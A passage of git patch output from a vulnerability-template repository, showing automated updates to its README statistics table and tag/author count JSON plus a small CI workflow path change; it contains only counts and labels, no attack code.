89 | technologies | 129 | low | 150 | | | -| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | -| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | | -| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | -| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | -| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 511 | dhiyaneshdk | 220 | Users | 1693 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | | | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | | | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | | | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | | | low | 147 | | | +| rce | 173 | daffainfo | 99 | | | | | | | +| cve2020 | 145 | madrobot | 60 | | | | | | | +| lfi | 143 | princechaddha | 52 | | | | | | | +| wp-plugin | 120 | gy741 | 48 | | | | | | | +| config | 90 | gaurang | 42 | | | | | | | From 4f92f87d049ce6494c2e322b4d745249c322a940 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 26 Jul 2021 17:55:40 +0000 Subject: [PATCH 1167/4083] Auto Update README [Mon Jul 26 17:55:40 UTC 2021] :robot: --- README.md | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 40c43fcb8c..69cf066955 100644 --- a/README.md +++ b/README.md @@ -40,8 +40,18 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----|-------|--------|-------|-----------|-------|----------|-------|------|-------| +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 511 | dhiyaneshdk | 220 | Users | 1693 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | | | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | | | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | | | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | | | low | 147 | | | +| rce | 173 | daffainfo | 99 | | | | | | | +| cve2020 | 145 | madrobot | 60 | | | | | | | +| lfi | 143 | princechaddha | 52 | | | | | | | +| wp-plugin | 120 | gy741 | 48 | | | | | | | +| config | 90 | gaurang | 42 | | | | | | **138 directories, 1709 files**. From ecc7933fcf31f2e7580ee20daf38e757e6b0f09a Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 23:27:15 +0530 Subject: [PATCH 1168/4083] path update --- .github/workflows/templates-stats.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index b470648a42..f7b8dbdeb9 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -29,17 +29,17 @@ jobs: - name: Markdown Stats run: | - templates-stats -output TEMPLATES-STATS.md -path {{ github.workspace }} + templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/ shell: bash - name: JSON Stats run: | - templates-stats -output TEMPLATES-STATS.json -json -path {{ github.workspace }} + templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/ shell: bash - name: Top 10 Stats run: | - templates-stats -output TOP-10.md -top 10 -path {{ github.workspace }} + templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/ shell: bash - name: Get statistical changes From 744066f5a8e9f392d0f4260a8712daef37d1962b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 26 Jul 2021 17:58:05 +0000 Subject: [PATCH 1169/4083] Auto Generated Templates Stats [Mon Jul 26 17:58:05 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1287 +++++++++++++++++++++--------------------- TOP-10.md | 24 +- 3 files changed, 656 insertions(+), 657 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index c407d36b3d..7f012a1194 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"misconfig","count":13},{"name":"android","count":12},{"name":"adobe","count":12},{"name":"auth-bypass","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"cve2012","count":11},{"name":"cve2013","count":10},{"name":"dlink","count":10},{"name":"php","count":10},{"name":"devops","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"magento","count":9},{"name":"aws","count":8},{"name":"router","count":8},{"name":"cnvd","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"ftp","count":8},{"name":"vmware","count":7},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"xxe","count":7},{"name":"nginx","count":7},{"name":"google","count":6},{"name":"citrix","count":6},{"name":"backup","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"coldfusion","count":6},{"name":"headless","count":5},{"name":"django","count":5},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"netgear","count":5},{"name":"ssti","count":5},{"name":"phpmyadmin","count":5},{"name":"circarlife","count":5},{"name":"ibm","count":5},{"name":"confluence","count":5},{"name":"lucee","count":5},{"name":"dedecms","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"solr","count":5},{"name":"ruijie","count":5},{"name":"java","count":5},{"name":"dell","count":5},{"name":"cve2009","count":5},{"name":"login","count":5},{"name":"moodle","count":4},{"name":"tomcat","count":4},{"name":"nodejs","count":4},{"name":"elastic","count":4},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"docker","count":4},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"crlf","count":4},{"name":"magmi","count":4},{"name":"jolokia","count":4},{"name":"asp","count":4},{"name":"vpn","count":4},{"name":"webserver","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"fpd","count":3},{"name":"windows","count":3},{"name":"caucho","count":3},{"name":"amazon","count":3},{"name":"grafana","count":3},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"printer","count":3},{"name":"deserialization","count":3},{"name":"nacos","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"log","count":3},{"name":"mongodb","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"openssh","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"kafka","count":3},{"name":"kubernetes","count":3},{"name":"bypass","count":3},{"name":"git","count":3},{"name":"terramaster","count":3},{"name":"springcloud","count":3},{"name":"ofbiz","count":3},{"name":"ebs","count":3},{"name":"lfr","count":3},{"name":"resin","count":3},{"name":"backups","count":3},{"name":"hp","count":3},{"name":"voipmonitor","count":2},{"name":"nagios","count":2},{"name":"ecology","count":2},{"name":"leak","count":2},{"name":"sonarqube","count":2},{"name":"cve2008","count":2},{"name":"jellyfin","count":2},{"name":"splunk","count":2},{"name":"dos","count":2},{"name":"zhiyuan","count":2},{"name":"igs","count":2},{"name":"spark","count":2},{"name":"hpe","count":2},{"name":"saltstack","count":2},{"name":"icewarp","count":2},{"name":"kevinlab","count":2},{"name":"flir","count":2},{"name":"smb","count":2},{"name":"xxljob","count":2},{"name":"odoo","count":2},{"name":"fortios","count":2},{"name":"activemq","count":2},{"name":"prometheus","count":2},{"name":"telerik","count":2},{"name":"maian","count":2},{"name":"httpd","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"hjtcloud","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"cve2007","count":2},{"name":"kentico","count":2},{"name":"natshell","count":2},{"name":"openfire","count":2},{"name":"chiyu","count":2},{"name":"vrealize","count":2},{"name":"linkerd","count":2},{"name":"globalprotect","count":2},{"name":"nextjs","count":2},{"name":"intrusive","count":2},{"name":"pega","count":2},{"name":"yapi","count":2},{"name":"huawei","count":2},{"name":"mida","count":2},{"name":"hashicorp","count":2},{"name":"jboss","count":2},{"name":"injection","count":2},{"name":"waf","count":2},{"name":"frp","count":2},{"name":"proxy","count":2},{"name":"rstudio","count":2},{"name":"webcam","count":2},{"name":"chamilo","count":2},{"name":"oauth","count":2},{"name":"paloalto","count":2},{"name":"shellshock","count":2},{"name":"showdoc","count":2},{"name":"sonicwall","count":2},{"name":"nexus","count":2},{"name":"couchdb","count":2},{"name":"bigip","count":2},{"name":"cache","count":2},{"name":"seeyon","count":2},{"name":"service","count":2},{"name":"bitrix","count":2},{"name":"wordfence","count":2},{"name":"kibana","count":2},{"name":"openam","count":2},{"name":"keycloak","count":2},{"name":"mail","count":2},{"name":"rockethchat","count":2},{"name":"smtp","count":2},{"name":"sharepoint","count":2},{"name":"idrac","count":2},{"name":"rockmongo","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"plesk","count":2},{"name":"zabbix","count":2},{"name":"opencast","count":1},{"name":"chevereto","count":1},{"name":"discord","count":1},{"name":"exchange","count":1},{"name":"csod","count":1},{"name":"cse","count":1},{"name":"ambari","count":1},{"name":"plugin","count":1},{"name":"enumeration","count":1},{"name":"redwood","count":1},{"name":"mariadb","count":1},{"name":"jenkin","count":1},{"name":"starttls","count":1},{"name":"visualtools","count":1},{"name":"aspnuke","count":1},{"name":"mobileiron","count":1},{"name":"fastapi","count":1},{"name":"druid","count":1},{"name":"bitly","count":1},{"name":"salesforce","count":1},{"name":"tamronos","count":1},{"name":"74cms","count":1},{"name":"cors","count":1},{"name":"circontrol","count":1},{"name":"grav","count":1},{"name":"drone","count":1},{"name":"yii","count":1},{"name":"solman","count":1},{"name":"pgadmin","count":1},{"name":"avalanche","count":1},{"name":"diris","count":1},{"name":"faraday","count":1},{"name":"fortigate","count":1},{"name":"vnc","count":1},{"name":"phpinfo","count":1},{"name":"rubedo","count":1},{"name":"turbocrm","count":1},{"name":"szhe","count":1},{"name":"floc","count":1},{"name":"primetek","count":1},{"name":"backdoor","count":1},{"name":"phpunit","count":1},{"name":"sangfor","count":1},{"name":"2014","count":1},{"name":"acme","count":1},{"name":"viewpoint","count":1},{"name":"subrion","count":1},{"name":"symfony","count":1},{"name":"fortiweb","count":1},{"name":"emby","count":1},{"name":"tika","count":1},{"name":"fastcgi","count":1},{"name":"triconsole","count":1},{"name":"opensmtpd","count":1},{"name":"tapestry","count":1},{"name":"sarg","count":1},{"name":"upnp","count":1},{"name":"chinaunicom","count":1},{"name":"oscommerce","count":1},{"name":"seacms","count":1},{"name":"krweb","count":1},{"name":"rdp","count":1},{"name":"discourse","count":1},{"name":"openstack","count":1},{"name":"akamai","count":1},{"name":"alibaba","count":1},{"name":"mediumish","count":1},{"name":"eyou","count":1},{"name":"jitsi","count":1},{"name":"clusterengine","count":1},{"name":"ec2","count":1},{"name":"email","count":1},{"name":"b2evolution","count":1},{"name":"wazuh","count":1},{"name":"netis","count":1},{"name":"mongoshake","count":1},{"name":"thinkadmin","count":1},{"name":"mara","count":1},{"name":"mautic","count":1},{"name":"netrc","count":1},{"name":"phalcon","count":1},{"name":"panabit","count":1},{"name":"k8","count":1},{"name":"dotnet","count":1},{"name":"lotuscms","count":1},{"name":"redhat","count":1},{"name":"jquery","count":1},{"name":"nc2","count":1},{"name":"nedi","count":1},{"name":"proftpd","count":1},{"name":"myucms","count":1},{"name":"shopware","count":1},{"name":"moin","count":1},{"name":"blue-ocean","count":1},{"name":"fortinet","count":1},{"name":"wildfly","count":1},{"name":"ns","count":1},{"name":"nexusdb","count":1},{"name":"pacsone","count":1},{"name":"skywalking","count":1},{"name":"crm","count":1},{"name":"ruby","count":1},{"name":"mirai","count":1},{"name":"sprintful","count":1},{"name":"ilo4","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"synnefo","count":1},{"name":"goahead","count":1},{"name":"kubeflow","count":1},{"name":"expose","count":1},{"name":"visionhub","count":1},{"name":"gateone","count":1},{"name":"enum","count":1},{"name":"doh","count":1},{"name":"portainer","count":1},{"name":"mpsec","count":1},{"name":"lansweeper","count":1},{"name":"nuuo","count":1},{"name":"octoprint","count":1},{"name":"itop","count":1},{"name":"gitlist","count":1},{"name":"circontrorl","count":1},{"name":"ueditor","count":1},{"name":"rmc","count":1},{"name":"duomicms","count":1},{"name":"wso2","count":1},{"name":"fuelcms","count":1},{"name":"redcap","count":1},{"name":"zookeeper","count":1},{"name":"apiman","count":1},{"name":"tpshop","count":1},{"name":"klog","count":1},{"name":"codeigniter","count":1},{"name":"npm","count":1},{"name":"jfrog","count":1},{"name":"mcafee","count":1},{"name":"accela","count":1},{"name":"saltapi","count":1},{"name":"alerta","count":1},{"name":"axis","count":1},{"name":"memcached","count":1},{"name":"sqlite","count":1},{"name":"ssltls","count":1},{"name":"codemeter","count":1},{"name":"lancom","count":1},{"name":"varnish","count":1},{"name":"zimbra","count":1},{"name":"linksys","count":1},{"name":"vsftpd","count":1},{"name":"jeewms","count":1},{"name":"kafdrop","count":1},{"name":"bookstack","count":1},{"name":"swagger","count":1},{"name":"robomongo","count":1},{"name":"flash","count":1},{"name":"jmx","count":1},{"name":"wooyun","count":1},{"name":"nomad","count":1},{"name":"timeclock","count":1},{"name":"nuxeo","count":1},{"name":"lanproxy","count":1},{"name":"vsphere","count":1},{"name":"tensorflow","count":1},{"name":"status","count":1},{"name":"geddy","count":1},{"name":"xml","count":1},{"name":"biometrics","count":1},{"name":"weiphp","count":1},{"name":"labtech","count":1},{"name":"jsp","count":1},{"name":"haproxy","count":1},{"name":"springframework","count":1},{"name":"kyan","count":1},{"name":"pulsesecure","count":1},{"name":"zzzcms","count":1},{"name":"plc","count":1},{"name":"openrestry","count":1},{"name":"ganglia","count":1},{"name":"xiuno","count":1},{"name":"glances","count":1},{"name":"huijietong","count":1},{"name":"concrete","count":1},{"name":"spring","count":1},{"name":"firebase","count":1},{"name":"embedthis","count":1},{"name":"expn","count":1},{"name":"jenzabar","count":1},{"name":"zenario","count":1},{"name":"xdcms","count":1},{"name":"etouch","count":1},{"name":"clockwatch","count":1},{"name":"db","count":1},{"name":"trilithic","count":1},{"name":"horde","count":1},{"name":"bedita","count":1},{"name":"aura","count":1},{"name":"tileserver","count":1},{"name":"keenetic","count":1},{"name":"geutebruck","count":1},{"name":"kong","count":1},{"name":"rhymix","count":1},{"name":"emc","count":1},{"name":"servicenow","count":1},{"name":"clave","count":1},{"name":"tenda","count":1},{"name":"opentsdb","count":1},{"name":"lutron","count":1},{"name":"payara","count":1},{"name":"hadoop","count":1},{"name":"viewlinc","count":1},{"name":"bash","count":1},{"name":"arl","count":1},{"name":"scs","count":1},{"name":"checkpoint","count":1},{"name":"traefik","count":1},{"name":"zm","count":1},{"name":"landrayoa","count":1},{"name":"zte","count":1},{"name":"zeroshell","count":1},{"name":"csrf","count":1},{"name":"sidekiq","count":1},{"name":"yachtcontrol","count":1},{"name":"metinfo","count":1},{"name":"appweb","count":1},{"name":"wiki","count":1},{"name":"smartsense","count":1},{"name":"netdata","count":1},{"name":"expressjs","count":1},{"name":"woocomernce","count":1},{"name":"feifeicms","count":1},{"name":"parentlink","count":1},{"name":"landray","count":1},{"name":"setup","count":1},{"name":"blind","count":1},{"name":"liferay","count":1},{"name":"wavemaker","count":1},{"name":"wp-theme","count":1},{"name":"dlogin","count":1},{"name":"jnoj","count":1},{"name":"totaljs","count":1},{"name":"sceditor","count":1},{"name":"nps","count":1},{"name":"addpac","count":1},{"name":"redis","count":1},{"name":"zcms","count":1},{"name":"commscope","count":1},{"name":"alertmanager","count":1},{"name":"avtech","count":1},{"name":"grails","count":1},{"name":"ecom","count":1},{"name":"webmin","count":1},{"name":"bolt","count":1},{"name":"sentry","count":1},{"name":"zend","count":1},{"name":"ricoh","count":1},{"name":"dvr","count":1},{"name":"shopxo","count":1},{"name":"gridx","count":1},{"name":"anchorcms","count":1},{"name":"stem","count":1},{"name":"panos","count":1},{"name":"extractor","count":1},{"name":"wuzhicms","count":1},{"name":"cacti","count":1},{"name":"episerver","count":1},{"name":"heroku","count":1},{"name":"timesheet","count":1},{"name":"mailchimp","count":1},{"name":"iptime","count":1},{"name":"netsweeper","count":1},{"name":"moinmoin","count":1},{"name":"javafaces","count":1},{"name":"beanshell","count":1},{"name":"optiLink","count":1},{"name":"gloo","count":1},{"name":"h3c-imc","count":1},{"name":"mantis","count":1},{"name":"sitecore","count":1},{"name":"postgres","count":1},{"name":"centos","count":1},{"name":"rujjie","count":1},{"name":"cloudinary","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"spidercontrol","count":1},{"name":"dvwa","count":1},{"name":"opensns","count":1},{"name":"monitorr","count":1},{"name":"mantisbt","count":1},{"name":"wamp","count":1},{"name":"tensorboard","count":1},{"name":"apos","count":1},{"name":"webadmin","count":1},{"name":"wmt","count":1},{"name":"comodo","count":1},{"name":"manageengine","count":1},{"name":"jsf","count":1},{"name":"dom","count":1},{"name":"hortonworks","count":1},{"name":"rabbitmq","count":1},{"name":"svn","count":1},{"name":"esmtp","count":1},{"name":"idemia","count":1},{"name":"glpi","count":1},{"name":"favicon","count":1},{"name":"majordomo2","count":1},{"name":"node-red-dashboard","count":1},{"name":"realteo","count":1},{"name":"ntopng","count":1},{"name":"hasura","count":1},{"name":"selea","count":1},{"name":"lighttpd","count":1},{"name":"upload","count":1},{"name":"cgi","count":1},{"name":"fiori","count":1},{"name":"nordex","count":1},{"name":"javascript","count":1},{"name":"sco","count":1},{"name":"postmessage","count":1},{"name":"fortilogger","count":1},{"name":"xunchi","count":1},{"name":"soar","count":1},{"name":"monitorix","count":1},{"name":"magicflow","count":1},{"name":"darkstat","count":1},{"name":"openerp","count":1},{"name":"uwsgi","count":1},{"name":"powercreator","count":1},{"name":"blackboard","count":1},{"name":"webui","count":1},{"name":"pyramid","count":1},{"name":"ssl","count":1},{"name":"javamelody","count":1},{"name":"exacqvision","count":1},{"name":"ulterius","count":1},{"name":"empirecms","count":1},{"name":"harbor","count":1},{"name":"finereport","count":1},{"name":"svnserve","count":1},{"name":"rsyncd","count":1},{"name":"ems","count":1},{"name":"gogs","count":1},{"name":"dotnetnuke","count":1},{"name":"linkedin","count":1},{"name":"phpfusion","count":1},{"name":"octobercms","count":1},{"name":"mdb","count":1},{"name":"pippoint","count":1},{"name":"vscode","count":1},{"name":"spf","count":1},{"name":"wavlink","count":1},{"name":"webmodule-ee","count":1},{"name":"calendarix","count":1},{"name":"tongda","count":1},{"name":"rfi","count":1},{"name":"plone","count":1},{"name":"azure","count":1},{"name":" default-login","count":1},{"name":"nsasg","count":1},{"name":"pagespeed","count":1},{"name":"maccmsv10","count":1},{"name":"webftp","count":1},{"name":"dotclear","count":1},{"name":"scimono","count":1},{"name":"hiboss","count":1},{"name":"cve2005","count":1},{"name":"acexy","count":1},{"name":"rmi","count":1},{"name":"bruteforce","count":1},{"name":"ruckus","count":1},{"name":"livezilla","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"socomec","count":1},{"name":"opm","count":1},{"name":"cobub","count":1},{"name":"spectracom","count":1},{"name":"zmanda","count":1},{"name":"razor","count":1},{"name":"erp-nc","count":1},{"name":"interlib","count":1},{"name":"xmlchart","count":1},{"name":"flink","count":1},{"name":"xff","count":1},{"name":"adminer","count":1},{"name":"bullwark","count":1},{"name":"kerbynet","count":1},{"name":"cocoon","count":1},{"name":"plastic","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"fortigates","count":1},{"name":"wifisky","count":1},{"name":"eprints","count":1},{"name":"dompdf","count":1},{"name":"nette","count":1},{"name":"k8s","count":1},{"name":"ioncube","count":1},{"name":"node","count":1},{"name":"servicedesk","count":1},{"name":"fedora","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"melbadry9","count":8},{"name":"that_juan_","count":8},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fyoorer","count":3},{"name":"_generic_human_","count":3},{"name":"jarijaas","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"mavericknerd","count":3},{"name":"binaryfigments","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"joeldeleep","count":2},{"name":"randomrobbie","count":2},{"name":"random-robbie","count":2},{"name":"fabaff","count":2},{"name":"unstabl3","count":2},{"name":"ehsahil","count":2},{"name":"shifacyclewala","count":2},{"name":"davidmckennirey","count":2},{"name":"0xsapra","count":2},{"name":"emenalf","count":2},{"name":"bp0lr","count":2},{"name":"nkxxkn","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"ree4pwn","count":2},{"name":"w4cky_","count":2},{"name":"lu4nx","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"afaq","count":2},{"name":"gevakun","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"bing0o","count":2},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"udit_thakkur","count":2},{"name":"zomsop82","count":2},{"name":"incogbyte","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xprial","count":2},{"name":"moritz nentwig","count":2},{"name":"swissky","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"foulenzer","count":2},{"name":"amsda","count":2},{"name":"0xcrypto","count":2},{"name":"manuelbua","count":1},{"name":"knassar702","count":1},{"name":"hakluke","count":1},{"name":"mah3sec_","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dogasantos","count":1},{"name":"its0x08","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"naglinagli","count":1},{"name":"wabafet","count":1},{"name":"bernardofsr","count":1},{"name":"daviey","count":1},{"name":"bad5ect0r","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"luci","count":1},{"name":"zhenwarx","count":1},{"name":"kabirsuda","count":1},{"name":"vsh00t","count":1},{"name":"kareemse1im","count":1},{"name":"idealphase","count":1},{"name":"0xrod","count":1},{"name":"ahmed sherif","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"furkansenan","count":1},{"name":"undefl0w","count":1},{"name":"regala_","count":1},{"name":"yavolo","count":1},{"name":"ipanda","count":1},{"name":"qlkwej","count":1},{"name":"dawid czarnecki","count":1},{"name":"elmahdi","count":1},{"name":"rojanrijal","count":1},{"name":"pdp","count":1},{"name":"exploitation","count":1},{"name":"bolli95","count":1},{"name":"affix","count":1},{"name":"sullo","count":1},{"name":"fopina","count":1},{"name":"vzamanillo","count":1},{"name":"ringo","count":1},{"name":"berkdusunur","count":1},{"name":"ldionmarcil","count":1},{"name":"ajaysenr","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"flag007","count":1},{"name":"52971","count":1},{"name":"sshell","count":1},{"name":"_c0wb0y_","count":1},{"name":"rodnt","count":1},{"name":"johnk3r","count":1},{"name":"th3.d1p4k","count":1},{"name":"notsoevilweasel","count":1},{"name":"d0rkerdevil","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"0xteles","count":1},{"name":"alph4byt3","count":1},{"name":"ilovebinbash","count":1},{"name":"omarkurt","count":1},{"name":"yashgoti","count":1},{"name":"_harleo","count":1},{"name":"raesene","count":1},{"name":"chron0x","count":1},{"name":"tim_koopmans","count":1},{"name":"arcc","count":1},{"name":"retr0","count":1},{"name":"@dwisiswant0","count":1},{"name":"iampritam","count":1},{"name":"fmunozs","count":1},{"name":"tirtha_mandal","count":1},{"name":"andirrahmani1","count":1},{"name":"ooooooo_q","count":1},{"name":"kurohost","count":1},{"name":"streetofhackerr007","count":1},{"name":"s1r1u5_","count":1},{"name":"willd96","count":1},{"name":"toufik airane","count":1},{"name":"remonsec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"abison_binoy","count":1},{"name":"andysvints","count":1},{"name":"juicypotato1","count":1},{"name":"absshax","count":1},{"name":"0ut0fb4nd","count":1},{"name":"rtcms","count":1},{"name":"jeya seelan","count":1},{"name":"mhdsamx","count":1},{"name":"alifathi-h1","count":1},{"name":"sy3omda","count":1},{"name":"pudsec","count":1},{"name":"defr0ggy","count":1},{"name":"sicksec","count":1},{"name":"revblock","count":1},{"name":"cookiehanhoan","count":1},{"name":"akshansh","count":1},{"name":"yashanand155","count":1},{"name":"luskabol","count":1},{"name":"soyelmago","count":1},{"name":"alperenkesk","count":1},{"name":"taielab","count":1},{"name":"divya_mudgal","count":1},{"name":"patralos","count":1},{"name":"smaranchand","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"j33n1k4","count":1},{"name":"b0yd","count":1},{"name":"nytr0gen","count":1},{"name":"un-fmunozs","count":1},{"name":"deena","count":1},{"name":"jteles","count":1},{"name":"aresx","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"micha3lb3n","count":1},{"name":"shelld3v","count":1},{"name":"thevillagehacker","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"gboddin","count":1},{"name":"schniggie","count":1},{"name":"bjhulst","count":1},{"name":"co0nan","count":1},{"name":"b4uh0lz","count":1},{"name":"noamrathaus","count":1},{"name":"thezakman","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"gal nagli","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"_darrenmartyn","count":1},{"name":"shreyapohekar","count":1},{"name":"petruknisme","count":1},{"name":"mubassirpatel","count":1},{"name":"hanlaomo","count":1},{"name":"geraldino2","count":1},{"name":"mohammedsaneem","count":1},{"name":"blckraven","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sickwell","count":1},{"name":"r3naissance","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"zandros0","count":1},{"name":"whynotke","count":1},{"name":"apt-mirror","count":1},{"name":"becivells","count":1},{"name":"makyotox","count":1},{"name":"ratnadip 